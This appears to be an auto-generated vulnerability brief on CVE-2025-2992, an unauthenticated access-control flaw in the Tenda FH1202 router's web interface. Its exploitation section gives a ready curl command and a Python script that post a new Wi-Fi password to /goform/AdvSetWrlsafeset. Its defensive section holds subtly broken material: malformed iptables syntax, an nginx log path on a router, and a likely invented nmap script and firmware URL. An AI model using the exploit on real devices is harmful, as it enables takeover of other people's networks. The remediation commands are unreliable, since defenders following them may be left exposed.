How CVE-2025-2992 Works
The vulnerability in Tenda FH1202 firmware version 1.2.0.14(408) resides in the `/goform/AdvSetWrlsafeset` endpoint of the web management interface. Attackers can exploit improper access controls to send unauthenticated HTTP requests, bypassing authentication mechanisms. This allows remote execution of administrative functions, such as modifying wireless security settings. The flaw stems from insufficient validation of user-supplied input, enabling attackers to manipulate router configurations without credentials. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) confirms network-based exploitation with low attack complexity.
DailyCVE Form
Platform: Tenda FH1202
Version: 1.2.0.14(408)
Vulnerability: Improper Access Control
Severity: Critical
Date: 04/07/2025
What Undercode Say:
Exploitation
curl -X POST "http://<Tenda_IP>/goform/AdvSetWrlsafeset" -d "wifi_pass=attacker_pwd"
Python exploit script:
import requests
target = "http://192.168.1.1/goform/AdvSetWrlsafeset"
payload = {"wifi_pass": "hacked"}
response = requests.post(target, data=payload)
print(response.text)
Protection
1. Firmware Update:
wget https://www.tenda.com/firmware/FH1202_1.2.0.15.bin
2. Network Hardening:
iptables -A INPUT -p tcp --dport 80 -s ! <trusted_IP> -j DROP
3. Log Monitoring:
tail -f /var/log/nginx/access.log | grep "POST /goform/AdvSetWrlsafeset"
Analytics
- Attack Surface: Remote, unauthenticated HTTP requests.
- Impact: Full router compromise, credential theft.
- Mitigation: Disable web management on WAN, enforce strong passwords.
Detection
nmap -p 80 --script http-vuln-cve2025-2992 <target_IP>
References
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2992
Extra Source Hub:
Undercode
